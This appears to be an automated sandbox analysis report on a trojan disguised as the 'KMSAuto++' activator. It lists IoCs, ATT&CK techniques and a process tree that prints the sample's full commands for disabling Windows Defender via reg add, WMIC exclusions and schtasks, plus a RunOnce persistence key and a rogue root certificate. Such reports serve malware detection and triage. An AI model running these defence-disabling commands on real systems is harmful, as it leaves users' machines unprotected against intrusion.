a6856516f42de63846610b121a0585472e252d40ffcaddba201c3b5fa2abb520

Analysis

max time kernel
152s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20220812-es
resource tags

arch:x64arch:x86image:win10v2004-20220812-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
06-02-2023 17:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

KMSAuto++v1.6.4.exe
Size

718.9MB
MD5

ef8cd375fdc780a87dbf601860994ab9
SHA1

b0aac6fb4006091219ba82a5838e810e0e27beba
SHA256

a6856516f42de63846610b121a0585472e252d40ffcaddba201c3b5fa2abb520
SHA512

52db73a1bc0df076f74ed5fcb4d50ca7e46de6b7ee57cb7ee0223c96635dd01e4cafa403079fdeac25a219d402f5fdca608f76c8ed689540cac0d6c11b44c417
SSDEEP

786432:yo0mvb9vOggaeuNz9jMWZZ7vHMH85G1p14NPlT2sp:yavx2ggaL11MccpyPR2

Score

10^/10

evasion persistence trojan upx

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

KMSAuto++v1.6.4.exemicrosoft tap driver.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	KMSAuto++v1.6.4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	microsoft tap driver.exe

Executes dropped EXE 5 IoCs

Processes:

kms driver.exekmsauto++v1.6.4.exemicrosoft tap driver.exesvchost32.exesigntool.exe

pid process

1504 kms driver.exe
1980 kmsauto++v1.6.4.exe
1988 microsoft tap driver.exe
4500 svchost32.exe
4004 signtool.exe

pid	process
1504	kms driver.exe
1980	kmsauto++v1.6.4.exe
1988	microsoft tap driver.exe
4500	svchost32.exe
4004	signtool.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\kmsauto++v1.6.4.exe	upx
C:\Users\Admin\kmsauto++v1.6.4.exe	upx
C:\Users\Admin\microsoft tap driver.exe	upx
behavioral2/memory/1988-145-0x0000000000400000-0x000000000041F000-memory.dmp	upx
C:\Users\Admin\microsoft tap driver.exe	upx
behavioral2/memory/1980-155-0x0000000000400000-0x0000000001713000-memory.dmp	upx
behavioral2/memory/1988-200-0x0000000000400000-0x000000000041F000-memory.dmp	upx
behavioral2/memory/1980-201-0x0000000000400000-0x0000000001713000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

svchost32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	svchost32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchost32.exe = "C:\\Users\\Admin\\svchost32.exe"	svchost32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

Processes:

KMSAuto++v1.6.4.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	KMSAuto++v1.6.4.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

signtool.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C	signtool.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf5c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95	signtool.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

svchost32.exe

pid process

4500 svchost32.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

kms driver.exe

pid process

1504 kms driver.exe

pid	process
4500	svchost32.exe

pid	process
1504	kms driver.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

kms driver.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1504	kms driver.exe
Token: SeIncreaseQuotaPrivilege	2036	WMIC.exe
Token: SeSecurityPrivilege	2036	WMIC.exe
Token: SeTakeOwnershipPrivilege	2036	WMIC.exe
Token: SeLoadDriverPrivilege	2036	WMIC.exe
Token: SeSystemProfilePrivilege	2036	WMIC.exe
Token: SeSystemtimePrivilege	2036	WMIC.exe
Token: SeProfSingleProcessPrivilege	2036	WMIC.exe
Token: SeIncBasePriorityPrivilege	2036	WMIC.exe
Token: SeCreatePagefilePrivilege	2036	WMIC.exe
Token: SeBackupPrivilege	2036	WMIC.exe
Token: SeRestorePrivilege	2036	WMIC.exe
Token: SeShutdownPrivilege	2036	WMIC.exe
Token: SeDebugPrivilege	2036	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2036	WMIC.exe
Token: SeRemoteShutdownPrivilege	2036	WMIC.exe
Token: SeUndockPrivilege	2036	WMIC.exe
Token: SeManageVolumePrivilege	2036	WMIC.exe
Token: 33	2036	WMIC.exe
Token: 34	2036	WMIC.exe
Token: 35	2036	WMIC.exe
Token: 36	2036	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2036	WMIC.exe
Token: SeSecurityPrivilege	2036	WMIC.exe
Token: SeTakeOwnershipPrivilege	2036	WMIC.exe
Token: SeLoadDriverPrivilege	2036	WMIC.exe
Token: SeSystemProfilePrivilege	2036	WMIC.exe
Token: SeSystemtimePrivilege	2036	WMIC.exe
Token: SeProfSingleProcessPrivilege	2036	WMIC.exe
Token: SeIncBasePriorityPrivilege	2036	WMIC.exe
Token: SeCreatePagefilePrivilege	2036	WMIC.exe
Token: SeBackupPrivilege	2036	WMIC.exe
Token: SeRestorePrivilege	2036	WMIC.exe
Token: SeShutdownPrivilege	2036	WMIC.exe
Token: SeDebugPrivilege	2036	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2036	WMIC.exe
Token: SeRemoteShutdownPrivilege	2036	WMIC.exe
Token: SeUndockPrivilege	2036	WMIC.exe
Token: SeManageVolumePrivilege	2036	WMIC.exe
Token: 33	2036	WMIC.exe
Token: 34	2036	WMIC.exe
Token: 35	2036	WMIC.exe
Token: 36	2036	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1660	WMIC.exe
Token: SeSecurityPrivilege	1660	WMIC.exe
Token: SeTakeOwnershipPrivilege	1660	WMIC.exe
Token: SeLoadDriverPrivilege	1660	WMIC.exe
Token: SeSystemProfilePrivilege	1660	WMIC.exe
Token: SeSystemtimePrivilege	1660	WMIC.exe
Token: SeProfSingleProcessPrivilege	1660	WMIC.exe
Token: SeIncBasePriorityPrivilege	1660	WMIC.exe
Token: SeCreatePagefilePrivilege	1660	WMIC.exe
Token: SeBackupPrivilege	1660	WMIC.exe
Token: SeRestorePrivilege	1660	WMIC.exe
Token: SeShutdownPrivilege	1660	WMIC.exe
Token: SeDebugPrivilege	1660	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1660	WMIC.exe
Token: SeRemoteShutdownPrivilege	1660	WMIC.exe
Token: SeUndockPrivilege	1660	WMIC.exe
Token: SeManageVolumePrivilege	1660	WMIC.exe
Token: 33	1660	WMIC.exe
Token: 34	1660	WMIC.exe
Token: 35	1660	WMIC.exe
Token: 36	1660	WMIC.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

kmsauto++v1.6.4.exemicrosoft tap driver.exesigntool.exe

pid process

1980 kmsauto++v1.6.4.exe
1988 microsoft tap driver.exe
4004 signtool.exe

pid	process
1980	kmsauto++v1.6.4.exe
1988	microsoft tap driver.exe
4004	signtool.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

KMSAuto++v1.6.4.exekmsauto++v1.6.4.exemicrosoft tap driver.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4472 wrote to memory of 1504	4472	KMSAuto++v1.6.4.exe	kms driver.exe
PID 4472 wrote to memory of 1504	4472	KMSAuto++v1.6.4.exe	kms driver.exe
PID 4472 wrote to memory of 1980	4472	KMSAuto++v1.6.4.exe	kmsauto++v1.6.4.exe
PID 4472 wrote to memory of 1980	4472	KMSAuto++v1.6.4.exe	kmsauto++v1.6.4.exe
PID 4472 wrote to memory of 1980	4472	KMSAuto++v1.6.4.exe	kmsauto++v1.6.4.exe
PID 4472 wrote to memory of 1988	4472	KMSAuto++v1.6.4.exe	microsoft tap driver.exe
PID 4472 wrote to memory of 1988	4472	KMSAuto++v1.6.4.exe	microsoft tap driver.exe
PID 4472 wrote to memory of 1988	4472	KMSAuto++v1.6.4.exe	microsoft tap driver.exe
PID 1980 wrote to memory of 4908	1980	kmsauto++v1.6.4.exe	cmd.exe
PID 1980 wrote to memory of 4908	1980	kmsauto++v1.6.4.exe	cmd.exe
PID 1980 wrote to memory of 4904	1980	kmsauto++v1.6.4.exe	cmd.exe
PID 1980 wrote to memory of 4904	1980	kmsauto++v1.6.4.exe	cmd.exe
PID 4472 wrote to memory of 4500	4472	KMSAuto++v1.6.4.exe	svchost32.exe
PID 4472 wrote to memory of 4500	4472	KMSAuto++v1.6.4.exe	svchost32.exe
PID 4472 wrote to memory of 4500	4472	KMSAuto++v1.6.4.exe	svchost32.exe
PID 1988 wrote to memory of 2780	1988	microsoft tap driver.exe	cmd.exe
PID 1988 wrote to memory of 2780	1988	microsoft tap driver.exe	cmd.exe
PID 1980 wrote to memory of 4004	1980	kmsauto++v1.6.4.exe	signtool.exe
PID 1980 wrote to memory of 4004	1980	kmsauto++v1.6.4.exe	signtool.exe
PID 1980 wrote to memory of 4004	1980	kmsauto++v1.6.4.exe	signtool.exe
PID 4904 wrote to memory of 2036	4904	cmd.exe	WMIC.exe
PID 4904 wrote to memory of 2036	4904	cmd.exe	WMIC.exe
PID 2780 wrote to memory of 3540	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 3540	2780	cmd.exe	reg.exe
PID 1980 wrote to memory of 4360	1980	kmsauto++v1.6.4.exe	cmd.exe
PID 1980 wrote to memory of 4360	1980	kmsauto++v1.6.4.exe	cmd.exe
PID 2780 wrote to memory of 3264	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 3264	2780	cmd.exe	reg.exe
PID 4360 wrote to memory of 1660	4360	cmd.exe	WMIC.exe
PID 4360 wrote to memory of 1660	4360	cmd.exe	WMIC.exe
PID 2780 wrote to memory of 3612	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 3612	2780	cmd.exe	reg.exe
PID 1980 wrote to memory of 1932	1980	kmsauto++v1.6.4.exe	cmd.exe
PID 1980 wrote to memory of 1932	1980	kmsauto++v1.6.4.exe	cmd.exe
PID 2780 wrote to memory of 3804	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 3804	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 1096	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 1096	2780	cmd.exe	reg.exe
PID 1932 wrote to memory of 2836	1932	cmd.exe	WMIC.exe
PID 1932 wrote to memory of 2836	1932	cmd.exe	WMIC.exe
PID 2780 wrote to memory of 3056	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 3056	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 1028	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 1028	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 992	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 992	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 2500	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 2500	2780	cmd.exe	reg.exe
PID 1980 wrote to memory of 2376	1980	kmsauto++v1.6.4.exe	cmd.exe
PID 1980 wrote to memory of 2376	1980	kmsauto++v1.6.4.exe	cmd.exe
PID 2780 wrote to memory of 4196	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 4196	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 4828	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 4828	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 5100	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 5100	2780	cmd.exe	reg.exe
PID 2376 wrote to memory of 4372	2376	cmd.exe	WMIC.exe
PID 2376 wrote to memory of 4372	2376	cmd.exe	WMIC.exe
PID 2780 wrote to memory of 3064	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 3064	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 2812	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 2812	2780	cmd.exe	reg.exe
PID 2780 wrote to memory of 1624	2780	cmd.exe	schtasks.exe
PID 2780 wrote to memory of 1624	2780	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe
"C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4472

C:\Users\Admin\kms driver.exe
"C:\Users\Admin\kms driver.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504

C:\Users\Admin\kmsauto++v1.6.4.exe
"C:\Users\Admin\kmsauto++v1.6.4.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSAuto "C:\Users\Admin\AppData\Local\Temp\KMSAuto.tmp" /Y
3⤵
PID:4908

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\kmsauto++v1.6.4.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:4904

C:\Windows\System32\Wbem\WMIC.exe
WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\kmsauto++v1.6.4.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Users\Admin\AppData\Local\Temp\signtool.exe
"C:\Users\Admin\AppData\Local\Temp\signtool.exe" verify /v /ph /sha1 648384a4dee53d4c1c87e10d67cc99307ccc9c98 "C:\Users\Admin\kmsauto++v1.6.4.exe"
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:4004

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\KMSAuto_Files"
3⤵
- Suspicious use of WriteProcessMemory
PID:4360

C:\Windows\System32\Wbem\WMIC.exe
WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\KMSAuto_Files"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjPatcher.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\System32\Wbem\WMIC.exe
WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjPatcher.exe"
4⤵
PID:2836

C:\Windows\system32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjHook.dll"
3⤵
- Suspicious use of WriteProcessMemory
PID:2376

C:\Windows\System32\Wbem\WMIC.exe
WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjHook.dll"
4⤵
PID:4372

C:\Users\Admin\microsoft tap driver.exe
"C:\Users\Admin\microsoft tap driver.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AAEB.tmp\AAEC.tmp\AAED.bat "C:\Users\Admin\microsoft tap driver.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:2780

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:3540

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:3264

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
4⤵
PID:3612

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3804

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1096

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3056

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1028

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:992

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:2500

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:4196

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:4828

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:5100

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:3064

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:2812

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:1624

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:1556

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:3796

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:4264

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:2316

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:4460

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:2544

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:3676

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:4680

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:5092

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4808

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4388

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:3176

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:1628

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:2020

C:\Users\Admin\svchost32.exe
"C:\Users\Admin\svchost32.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:4500

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Install Root Certificate

T1130

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AAEB.tmp\AAEC.tmp\AAED.bat
Filesize
3KB

MD5
3a981c51aac5475414f6dea9f4e6ae1a

SHA1
90fb6d188c3a6a04f9294fabc71f62635f0c3ea6

SHA256
f6498b247cc03e1599bb19fc49dabb923b675bdfb0fd2348f78861842624f809

SHA512
a8b49ee8606681f5559d3edddf1708df86f33b9029f140030037d4d2dff40bd288e0c69096be0ead4da4019c0ca5efcf81a33c7405bc82040fe833bb473f0e0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\signtool.exe
Filesize
323KB

MD5
05624e6d27eaef0db0673ae627bd6027

SHA1
b155c76bf59992a8d75d0e3a59dc94f24aff2591

SHA256
962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313

SHA512
233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31

Download Submit
C:\Users\Admin\AppData\Local\Temp\signtool.exe
Filesize
323KB

MD5
05624e6d27eaef0db0673ae627bd6027

SHA1
b155c76bf59992a8d75d0e3a59dc94f24aff2591

SHA256
962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313

SHA512
233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31

Download Submit
C:\Users\Admin\kms driver.exe
Filesize
46KB

MD5
